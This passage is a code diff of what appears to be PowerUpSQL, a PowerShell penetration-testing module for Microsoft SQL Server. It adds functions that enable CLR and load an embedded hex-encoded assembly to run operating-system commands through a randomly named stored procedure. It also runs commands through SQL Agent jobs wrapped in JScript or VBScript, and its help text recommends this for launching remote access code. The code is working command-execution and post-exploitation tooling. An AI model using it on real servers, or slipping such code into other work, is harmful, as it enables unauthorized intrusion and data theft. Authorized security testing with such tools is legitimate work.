-Instance $Instance -Query "sp_configure 'CLR Enabled'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value + $IsShowAdvancedEnabled = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value + } + else + { + Write-Verbose -Message "$Instance : You are not a sysadmin. This command requires sysadmin privileges." - # Append results - $TblTables = $TblTables + $TblResults + # Add record + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'No sysadmin privileges.') + return + } + + # Enable show advanced options if needed + if ($IsShowAdvancedEnabled -eq 1) + { + Write-Verbose -Message "$Instance : Show Advanced Options is already enabled." + } + else + { + Write-Verbose -Message "$Instance : Show Advanced Options is disabled." + $DisableShowAdvancedOptions = 1 + + # Try to enable Show Advanced Options + Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',1;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Check if configuration change worked + $IsShowAdvancedEnabled2 = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value + + if ($IsShowAdvancedEnabled2 -eq 1) + { + Write-Verbose -Message "$Instance : Enabled Show Advanced Options." + } + else + { + Write-Verbose -Message "$Instance : Enabling Show Advanced Options failed. Aborting." + + # Add record + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Could not enable Show Advanced Options.') + return + } + } + + # Enable CLR if needed + if ($IsCLREnabled -eq 1) + { + Write-Verbose -Message "$Instance : CLR is already enabled." + } + else + { + Write-Verbose -Message "$Instance : CLR is disabled." + $DisableCLR = 1 + + # Try to enable CLR + Get-SQLQuery -Instance $Instance -Query "sp_configure 'CLR Enabled',1;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Check if configuration change worked + $IsCLREnabled2 = Get-SQLQuery -Instance $Instance -Query 'sp_configure "CLR Enabled"' -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value + + if ($IsCLREnabled2 -eq 1) + { + Write-Verbose -Message "$Instance : Enabled CLR." + } + else + { + Write-Verbose -Message "$Instance : Enabling CLR failed. Aborting." + + # Add record + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Could not enable CLR.') + + return + } + } + + # Set random length + $RandAssemblyLength = (8..15 | Get-Random -count 1 ) + + # Create assembly and proc names + $RandAssemblyName = (-join ((65..90) + (97..122) | Get-Random -Count $RandAssemblyLength | % {[char]$_})) + $RandProcName = (-join ((65..90) + (97..122) | Get-Random -Count $RandAssemblyLength | % {[char]$_})) + Write-Verbose -Message "$Instance : Assembly name: $RandAssemblyName" + Write-Verbose -Message "$Instance : CLR Procedure name: $RandProcName" + + # Create assembly + $Query_AddAssembly = "CREATE ASSEMBLY [$RandAssemblyName] AUTHORIZATION [dbo] from 0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C010300652F55590000000000000000E00002210B0108000008000000060000000000004E270000002000000040000000004000002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000002700004B00000000400000A002000000000000000000000000000000000000006000000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E7465787400000054070000002000000008000000020000000000000000000000000000200000602E72737263000000A00200000040000000040000000A0000000000000000000000000000400000402E72656C6F6300000C0000000060000000020000000E000000000000000000000000000040000042000000000000000000000000000000003027000000000000480000000200050028210000D8050000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013300600C30000000100001100730400000A0A066F0500000A72010000706F0600000A00066F0500000A72390000700F00280700000A280800000A6F0900000A00066F0500000A166F0A00000A00066F0500000A176F0B00000A00066F0C00000A26178D090000010C081672490000701F0C20A00F00006A730D00000AA208730E00000A0B280F00000A076F1000000A000716066F1100000A6F1200000A6F1300000A6F1400000A00280F00000A076F1500000A00280F00000A6F1600000A00066F1700000A00066F1800000A002A1E02281900000A2A0042534A4201000100000000000C00000076322E302E35303732370000000005006C000000E0010000237E00004C0200009002000023537472696E677300000000DC040000580000002355530034050000100000002347554944000000440500009400000023426C6F620000000000000002000001471502000900000000FA013300160000010000000F000000020000000200000001000000190000000300000001000000010000000300000000000A000100000000000600370030000A005F004A000600980078000600B80078000A00F900DE000E002E011B010E0036011B0106006C0130000A00BD01DE000A00C9013E000A00D301DE000A00E101DE000A00EC01DE00060018020E02060038020E0200000000010000000000010001000100100016000000050001000100502000000000960069000A0001001F21000000008618720010000200000001000F01190072001400210072001000290072001000310072001000310047011E00390055012300110062012800410073012C0039007A01230039008801320039009C0132003100B7013700490072003B005900720043006100F4014A006900FD014F0031002502550079004302280009004D022800590056025A00690060024F0069006F02100031007E02100031008A02100009007200100020001B0019002E000B006A002E00130073006000048000000000000000000000000000000000D6000000020000000000000000000000010027000000000002000000000000000000000001003E000000000002000000000000000000000001003000000000000000003C4D6F64756C653E00636C7266696C652E646C6C0053746F72656450726F63656475726573006D73636F726C69620053797374656D004F626A6563740053797374656D2E446174610053797374656D2E446174612E53716C54797065730053716C537472696E6700636D645F65786563002E63746F720053797374656D2E52756E74696D652E436F6D70696C6572536572766963657300436F6D70696C6174696F6E52656C61786174696F6E734174747269627574650052756E74696D65436F6D7061746962696C69747941747472696275746500636C7266696C65004D6963726F736F66742E53716C5365727665722E5365727665720053716C50726F6365647572654174747269627574650065786563436F6D6D616E640053797374656D2E446961676E6F73746963730050726F636573730050726F636573735374617274496E666F006765745F5374617274496E666F007365745F46696C654E616D65006765745F56616C756500537472696E6700466F726D6174007365745F417267756D656E7473007365745F5573655368656C6C45786563757465007365745F52656469726563745374616E646172644F75747075740053746172740053716C4D657461446174610053716C4462547970650053716C446174615265636F72640053716C436F6E746578740053716C50697065006765745F506970650053656E64526573756C747353746172740053797374656D2E494F0053747265616D526561646572006765745F5374616E646172644F757470757400546578745265616465720052656164546F456E6400546F537472696E6700536574537472696E670053656E64526573756C7473526F770053656E64526573756C7473456E640057616974466F724578697400436C6F736500003743003A005C00570069006E0064006F00770073005C00530079007300740065006D00330032005C0063006D0064002E00650078006500000F20002F00430020007B0030007D00000D6F007500740070007500740000002A5DFE759C75BA4399A49F834BF07EE50008B77A5C561934E0890500010111090320000104200101080401000000042000121D042001010E0320000E0500020E0E1C042001010203200002072003010E11290A062001011D1225040000123505200101122D042000123905200201080E0907031219122D1D12250801000800000000001E01000100540216577261704E6F6E457863657074696F6E5468726F77730100002827000000000000000000003E270000002000000000000000000000000000000000000000000000302700000000000000005F436F72446C6C4D61696E006D73636F7265652E646C6C0000000000FF25002040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100100000001800008000000000000000000000000000000100010000003000008000000000000000000000000000000100000000004800000058400000440200000000000000000000440234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00000100000000000000000000000000000000003F000000000000000400000002000000000000000000000000000000440000000100560061007200460069006C00650049006E0066006F00000000002400040000005400720061006E0073006C006100740069006F006E00000000000000B004A4010000010053007400720069006E006700460069006C00650049006E0066006F0000008001000001003000300030003000300034006200300000002C0002000100460069006C0065004400650073006300720069007000740069006F006E000000000020000000300008000100460069006C006500560065007200730069006F006E000000000030002E0030002E0030002E003000000038000C00010049006E007400650072006E0061006C004E0061006D006500000063006C007200660069006C0065002E0064006C006C0000002800020001004C006500670061006C0043006F00700079007200690067006800740000002000000040000C0001004F0072006900670069006E0061006C00460069006C0065006E0061006D006500000063006C007200660069006C0065002E0064006C006C000000340008000100500072006F006400750063007400560065007200730069006F006E00000030002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560065007200730069006F006E00000030002E0030002E0030002E00300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C000000503700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 with permission_set = UNSAFE" + Get-SQLQuery -Instance $Instance -Query $Query_AddAssembly -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -Database "MSDB" + + # Create procedure + $Query_AddProc = "CREATE PROCEDURE [dbo].[$RandProcName] @execCommand NVARCHAR (MAX) AS EXTERNAL NAME [$RandAssemblyName].[StoredProcedures].[cmd_exec];" + Get-SQLQuery -Instance $Instance -Query $Query_AddProc -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -Database "MSDB" + + # Setup OS command + Write-Verbose -Message "$Instance : Running command: $Command" + $Query = "EXEC [$RandProcName] '$Command'" + + # Execute OS command + $CmdResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -Database "MSDB" + + # Display results or add to final results table + if($RawResults) + { + [string]$CmdResults.output + } + else + { + try + { + $null = $TblResults.Rows.Add($ComputerName, $Instance, [string]$CmdResults.output) + } + catch + { + } + } + + # Remove procedure and assembly + Get-SQLQuery -Instance $Instance -Query "DROP PROCEDURE $RandProcName" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -Database "MSDB" + Get-SQLQuery -Instance $Instance -Query "DROP ASSEMBLY $RandAssemblyName" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -Database "MSDB" + + # Restore CLR state if needed + if($DisableCLR -eq 1) + { + Write-Verbose -Message "$Instance : Disabling CLR" + Get-SQLQuery -Instance $Instance -Query "sp_configure 'CLR Enabled',0;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + } + + # Restore Show Advanced Options state if needed + if($DisableShowAdvancedOptions -eq 1) + { + Write-Verbose -Message "$Instance : Disabling Show Advanced Options" + Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',0;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + } + + # Close connection + $Connection.Close() + + # Dispose connection + $Connection.Dispose() + } + catch + { + # Connection failed + + if(-not $SuppressVerbose) + { + $ErrorMessage = $_.Exception.Message + Write-Verbose -Message "$Instance : Connection Failed." + #Write-Verbose " Error: $ErrorMessage" + } + + # Add record + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Not Accessible') + } } - } - End - { - # Return data - $TblTables + # Run scriptblock using multi-threading + $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue + + return $TblResults } } # ---------------------------------- -# Get-SQLColumn +# Invoke-SQLOSCmd # ---------------------------------- -# Author: Scott Sutherland -Function Get-SQLColumn +# Author: Leo Loobeek +# Updates By: Scott Sutherland +# TODO: +# - Find better option for SQL Agent Service check +# - Find better option for SQL Agent Service start +# - Add raw script option for jscript/vbscript +Function Invoke-SQLOSCmdAgentJob { <# .SYNOPSIS - Returns column information from target SQL Servers. Supports keyword search. + Run operating system commands on a Microsoft SQL server by + leveraging the SQL Agent Job service. There is not a method to retrieve the output, + but it's useful for launching remote access code or sending output through another means. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password @@ -2535,30 +3138,49 @@ Function Get-SQLColumn SQL Server instance to connection to. .PARAMETER DAC Connect using Dedicated Admin Connection. - .PARAMETER DatabaseName - Database name filter. - .PARAMETER TableName - Table name filter. - .PARAMETER ColumnName - Column name filter. - .PARAMETER ColumnNameSearch - Column name filter that support wildcards. - .PARAMETER NoDefaults - Don't list anything from default databases. + .PARAMETER TimeOut + Connection time out. + .PARAMETER Sleep + Command execution time in seconds. + .PARAMETER SuppressVerbose + Suppress verbose errors. Used when function is wrapped. + .PARAMETER Type + The type of Job subsystem to launch. Choices are CmdExec (windows command) or PowerShell. + .PARAMETER Command + Based on type chosen above, this is the command launched when the job is executed. If nesting PowerShell + variables within the command, it will need to be escaped with ` (back tick). + .LINK + https://technet.microsoft.com/en-us/library/ms187100(v=sql.105).aspx + PowerShell/CMDEXEC SubSystem code taken from Nick Popovich (@pipefish_) from Optiv. + https://www.optiv.com/blog/mssql-agent-jobs-for-command-execution + ActiveX VBScript/Jscript SubSystem code based on scripts on Microsoft documentation. .EXAMPLE - PS C:\> Get-SQLColumn -Verbose -Instance "SQLServer1" + Invoke-SQLOSCmdAgentJob -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -Username sa -Password 'EvilLama!' -SubSystem CmdExec -Command "echo hello > c:\windows\temp\test1.txt" + Invoke-SQLOSCmdAgentJob -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -Username sa -Password 'EvilLama!' -SubSystem PowerShell -Command 'Write-Host "hello world" | out-file c:\windows\temp\test2.txt' -Sleep 20 + Invoke-SQLOSCmdAgentJob -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -Username sa -Password 'EvilLama!' -SubSystem VBScript -Command 'c:\windows\system32\cmd.exe /c echo hello > c:\windows\temp\test3.txt' + Invoke-SQLOSCmdAgentJob -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -Username sa -Password 'EvilLama!' -SubSystem JScript -Command 'c:\windows\system32\cmd.exe /c echo hello > c:\windows\temp\test4.txt' .EXAMPLE - PS C:\> Get-SQLInstanceLocal | Get-SQLColumn -Verbose + Invoke-SQLOSCmdAgentJob -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -Username sa -Password 'EvilLama!' -SubSystem JScript -Command 'c:\windows\system32\cmd.exe /c echo hello > c:\windows\temp\test5.txt' + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Connection Success. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : SubSystem: JScript + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Command: c:\windows\system32\cmd.exe /c echo hello > c:\windows\temp\test.txt + VERBOSE: MSSQLSRV04\SQLSERVER2014 : You have EXECUTE privileges to create Agent Jobs (sp_add_job). + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Running the command + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Starting sleep for 5 seconds + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Removing job from server + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Command complete + + ComputerName Instance Results + ------------ -------- ------- + MSSQLSRV04 MSSQLSRV04\SQLSERVER2014 The Job succesfully started and was removed. #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, @@ -2568,33 +3190,31 @@ Function Get-SQLColumn [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, + ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Database name.')] - [string]$DatabaseName, + HelpMessage = 'Connect using Dedicated Admin Connection.')] + [Switch]$DAC, - [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Table name.')] - [string]$TableName, + [Parameter(Mandatory = $true, + HelpMessage = 'Support subsystems include CmdExec, PowerShell, JScript, and VBScript.')] + [ValidateSet("CmdExec", "PowerShell","JScript","VBScript")] + [string] $SubSystem, - [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Filter by exact column name.')] - [string]$ColumnName, + [Parameter(Mandatory = $true, + HelpMessage = 'OS command to be executed.')] + [String]$Command, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Column name using wildcards in search. Supports comma seperated list.')] - [string]$ColumnNameSearch, + HelpMessage = 'Connection timeout.')] + [string]$TimeOut, [Parameter(Mandatory = $false, - HelpMessage = "Don't select tables from default databases.")] - [switch]$NoDefaults, + HelpMessage = 'Command run time before killing the agent job.')] + [int]$Sleep = 5, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] @@ -2603,154 +3223,243 @@ Function Get-SQLColumn Begin { - # Table for output - $TblColumns = New-Object -TypeName System.Data.DataTable + # Setup data table for output + $TblCommands = New-Object -TypeName System.Data.DataTable + $TblResults = New-Object -TypeName System.Data.DataTable + $null = $TblResults.Columns.Add('ComputerName') + $null = $TblResults.Columns.Add('Instance') + $null = $TblResults.Columns.Add('Results') - # Setup table filter - if($TableName) - { - $TableNameFilter = " and TABLE_NAME like '%$TableName%'" - } - else - { - $TableNameFilter = '' - } + } - # Setup column filter - if($ColumnName) - { - $ColumnFilter = " and column_name like '$ColumnName'" - } - else + Process + { + # Default connection to local default instance + if(-not $Instance) { - $ColumnFilter = '' + $Instance = $env:COMPUTERNAME } - # Setup column filter - if($ColumnNameSearch) + # Setup DAC string + if($DAC) { - $ColumnSearchFilter = " and column_name like '%$ColumnNameSearch%'" + # Create connection object + $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut } else { - $ColumnSearchFilter = '' + # Create connection object + $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut } - - # Setup column search filter - if($ColumnNameSearch) + # Attempt connection + try { - $Keywords = $ColumnNameSearch.split(',') + # Open connection + $Connection.Open() + if(-not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." - [int]$i = $Keywords.Count - while ($i -gt 0) + # Status configuration + Write-Verbose -Message "$Instance : SubSystem: $SubSystem" + Write-Verbose -Message "$Instance : Command: $Command" + } + + # Get some information about current context + $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + $CurrentLogin = $ServerInfo.CurrentLogin + $ComputerName = $ServerInfo.ComputerName + $SysadminStatus = $ServerInfo.IsSysAdmin + + <# table not accessible to non sysadmin logins that may have other privileges + # Check if Agent Job service is running + $IsAgentServiceEnabled = Get-SQLQuery -Instance $Instance -Query "SELECT 1 FROM sysprocesses WHERE LEFT(program_name, 8) = 'SQLAgent'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # See if the SQL Server Agent Service is enabled + + if ($IsAgentServiceEnabled) { - $i = $i - 1 - $Keyword = $Keywords[$i] + Write-Verbose -Message "$Instance : Verfied the SQL Server Agent service is running." + } + else + { + # TODO: Find reliable way to start agent service if possible + Write-Verbose -Message "$Instance : SQL Server Agent service has not been started. Aborting..." + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'SQL Server Agent service not started.') + return + } + #> - if($i -eq ($Keywords.Count -1)) - { - $ColumnSearchFilter = "and column_name like '%$Keyword%'" - } - else - { - $ColumnSearchFilter = $ColumnSearchFilter + " or column_name like '%$Keyword%'" + # https://msdn.microsoft.com/en-us/library/ms188283.aspx + # Check to see if member of any SQL Agent roles listed above + # If a user is a sysadmin, or a member of any of the 3 database roles they should be able to + # create and execute their own agent jobs on the SQL server. + + # Check for sysadmin role + if($SysadminStatus -eq "Yes"){ + $ConfirmedPrivs = $CurrentLogin + } + + # Check for agent database roles + $AddJobPrivs = Get-SQLDatabaseRoleMember -Username $Username -Password $Password -Instance $Instance -DatabaseName msdb -SuppressVerbose | + ForEach-Object { + if(($_.RolePrincipalName -match "SQLAgentUserRole|SQLAgentReaderRole|SQLAgentOperatorRole")) { + if ($_.PrincipalName -eq $CurrentLogin) { + $ConfirmedPrivs = $CurrentLogin + } } } - } - } - Process - { - # Note: Tables queried by this function typically require sysadmin or DBO privileges. + # Attempt to create the agent jobs + if($ConfirmedPrivs) + { + Write-Verbose -Message "$Instance : You have EXECUTE privileges to create Agent Jobs (sp_add_job)." - # Parse computer name from the instance - $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + # Setup place holder for $DatabaseSub + $DatabaseSub = "" + $SubSystemFinal = $SubSystem - # Default connection to local default instance - if(-not $Instance) - { - $Instance = $env:COMPUTERNAME - } + # Setup JScript wrapper + If($SubSystem -eq "JScript"){ - # Test connection to instance - $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { - $_.Status -eq 'Accessible' - } - if($TestConnection) - { - if( -not $SuppressVerbose) + # Double the slashes to support the command syntax + $Command = $Command.Replace("\","\\") + + + # Create the JScript + # Example command: c:\\windows\\system32\\cmd.exe /c echo hello > c:\\windows\\temp\\blah.txt + $JScript_Command = @" +function RunCmd() +{ + var WshShell = new ActiveXObject("WScript.Shell"); + var oExec = WshShell.Exec("$Command"); + oExec = null; + WshShell = null; +} + +RunCmd(); +"@ + # Overwrite command with the JScript + $Command = $JScript_Command + $SubSystemFinal = "ActiveScripting" + $DatabaseSub = "@database_name=N'JavaScript'," + } + + + # Setup VBScript wrapper + If($SubSystem -eq "VBScript"){ + + # Create the VBScript + # Example Command: c:\windows\system32\cmd.exe /c echo hello > c:\windows\temp\blah.txt + $VBScript_Command = @" +Function Main() + dim shell + set shell= CreateObject ("WScript.Shell") + shell.run("$Command") + set shell = nothing +END Function +"@ + # Overwrite command with the VBScript + $Command = $VBScript_Command + $SubSystemFinal = "ActiveScripting" + $DatabaseSub = "@database_name=N'VBScript'," + } + + # Fix single quotes so then can be used within commands ' -> '' + $Command = $Command -replace "'","''" + + # Got the privs, let's execute some malicious code! + # SQL Query taken from https://www.optiv.com/blog/mssql-agent-jobs-for-command-execution + # Authors: + # Nicholas Popovich for PowerShelland CmdExec + # Scott Sutherland for VBScript and JScript + $JobQuery = "USE msdb; + EXECUTE dbo.sp_add_job + @job_name = N'powerupsql_job' + + EXECUTE sp_add_jobstep + @job_name = N'powerupsql_job', + @step_name = N'powerupsql_job_step', + @subsystem = N'$SubSystemFinal', + @command = N'$Command', + $DatabaseSub + @flags=0, + @retry_attempts = 1, + @retry_interval = 5 + + + EXECUTE dbo.sp_add_jobserver + @job_name = N'powerupsql_job' + + EXECUTE dbo.sp_start_job N'powerupsql_job'" + + $CleanUpQuery = "USE msdb; EXECUTE sp_delete_job @job_name = N'powerupsql_job';" + + Write-Verbose -Message "$Instance : Running the command" + + # Execute Query + Get-SQLQuery -Instance $Instance -Query $JobQuery -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + $result = Get-SQLQuery -Instance $Instance -Query "use msdb; EXECUTE sp_help_job @job_name = N'powerupsql_job'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + if(!($result)) { + Write-Warning "Job failed to start. Recheck your command and try again." + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Agent Job failed to start.') + return + } + + # Sleep for 5 seconds to ensure job starts, may need to increase or remove this after further testing + Write-Verbose "$Instance : Starting sleep for $Sleep seconds" + Start-Sleep $Sleep + + # Clean up the Job + Write-Verbose "$Instance : Removing job from server" + Get-SQLQuery -Instance $Instance -Query $CleanUpQuery -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'The Job succesfully started and was removed.') + + } + else { - Write-Verbose -Message "$Instance : Connection Success." + Write-Verbose -Message "$Instance : You do not have privileges to add agent jobs (sp_add_job). Aborting..." + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Insufficient privilieges to add Agent Jobs.') + return } + + # Close connection + $Connection.Close() + + # Dispose connection + $Connection.Dispose() + + # Status + Write-Verbose -Message "$Instance : Command complete" } - else + catch { - if( -not $SuppressVerbose) + # Connection failed + if(-not $SuppressVerbose) { + $ErrorMessage = $_.Exception.Message Write-Verbose -Message "$Instance : Connection Failed." + #Write-Verbose " Error: $ErrorMessage" } - return - } - - # Setup NoDefault filter - if($NoDefaults) - { - # Get list of databases - $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -NoDefaults -SuppressVerbose - } - else - { - # Get list of databases - $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -SuppressVerbose - } - - # Get tables for each database - $TblDatabases | - ForEach-Object -Process { - # Get database name - $DbName = $_.DatabaseName - - # Define Query - $Query = " USE $DbName; - SELECT '$ComputerName' as [ComputerName], - '$Instance' as [Instance], - TABLE_CATALOG AS [DatabaseName], - TABLE_SCHEMA AS [SchemaName], - TABLE_NAME as [TableName], - COLUMN_NAME as [ColumnName], - DATA_TYPE as [ColumnDataType], - CHARACTER_MAXIMUM_LENGTH as [ColumnMaxLength] - FROM [$DbName].[INFORMATION_SCHEMA].[COLUMNS] WHERE 1=1 - $ColumnSearchFilter - $ColumnFilter - $TableNameFilter - ORDER BY TABLE_CATALOG, TABLE_SCHEMA, TABLE_NAME" - - # Execute Query - $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -SuppressVerbose - - # Append results - $TblColumns = $TblColumns + $TblResults + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Not Accessible') } - } - End - { - # Return data - $TblColumns + return $TblResults } } -# --------------------------------------- -# Get-SQLColumnSampleData -# --------------------------------------- +# ---------------------------------- +# Get-SQLServerInfo +# ---------------------------------- # Author: Scott Sutherland -Function Get-SQLColumnSampleData +Function Get-SQLServerInfo { <# .SYNOPSIS - Returns column information from target SQL Servers. Supports search by keywords, sampling data, and validating credit card numbers. + Returns basic server and user information from target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password @@ -2759,34 +3468,30 @@ Function Get-SQLColumnSampleData SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. - .PARAMETER $NoOutput - Don't output any sample data. - .PARAMETER SampleSize - Number of records to sample. - .PARAMETER Keywords - Number of records to sample. - .PARAMETER DatabaseName - Database to filter on. - .PARAMETER ValidateCC - Use Luhn formula to check if sample is a valid credit card. - Column name filter that support wildcards. - .PARAMETER NoDefaults - Don't show columns from default databases. .EXAMPLE - PS C:\> Get-SQLColumnSampleData -verbose -Instance SQLServer1\STANDARDDEV2014 -Keywords "account,credit,card" -SampleSize 5 -ValidateCC| ft -AutoSize - VERBOSE: SQLServer1\STANDARDDEV2014 : START SEARCH DATA BY COLUMN - VERBOSE: SQLServer1\STANDARDDEV2014 : CONNECTION SUCCESS - VERBOSE: SQLServer1\STANDARDDEV2014 : - Searching for column names that match criteria... - VERBOSE: SQLServer1\STANDARDDEV2014 : - Column match: [testdb].[dbo].[tracking].[card] - VERBOSE: SQLServer1\STANDARDDEV2014 : - Selecting 5 rows of data sample from column [testdb].[dbo].[tracking].[card]. - VERBOSE: SQLServer1\STANDARDDEV2014 : COMPLETED SEARCH DATA BY COLUMN + PS C:\> Get-SQLServerInfo -Instance SQLServer1\STANDARDDEV2014 - ComputerName Instance Database Schema Table Column Sample RowCount IsCC - ------------ -------- -------- ------ ----- ------ ------ -------- ---- - SQLServer1 SQLServer1\STANDARDDEV2014 testdb dbo tracking card 4111111111111111 2 True - SQLServer1 SQLServer1\STANDARDDEV2014 testdb dbo tracking card 41111111111ASDFD 2 False + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + DomainName : Domain + ServiceProcessId : 6758 + ServiceName : MSSQL$STANDARDDEV2014 + ServiceAccount : LocalSystem + AuthenticationMode : Windows and SQL Server Authentication + Clustered : No + SQLServerVersionNumber : 12.0.4213.0 + SQLServerMajorVersion : 2014 + SQLServerEdition : Developer Edition (64-bit) + SQLServerServicePack : SP1 + OSArchitecture : X64 + OsMachineType : WinNT + OSVersionName : Windows 8.1 Pro + OsVersionNumber : 6.3 + Currentlogin : Domain\MyUser + IsSysadmin : Yes + ActiveSessions : 1 .EXAMPLE - PS C:\> Get-SQLInstanceLocal | Get-SQLColumnSampleData -Keywords "account,credit,card" -SampleSize 5 -ValidateCC + PS C:\> Get-SQLInstanceLocal | Get-SQLServerInfo -Verbose #> [CmdletBinding()] Param( @@ -2799,7 +3504,6 @@ Function Get-SQLColumnSampleData [string]$Password, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, @@ -2809,30 +3513,6 @@ Function Get-SQLColumnSampleData HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, - [Parameter(Mandatory = $false, - HelpMessage 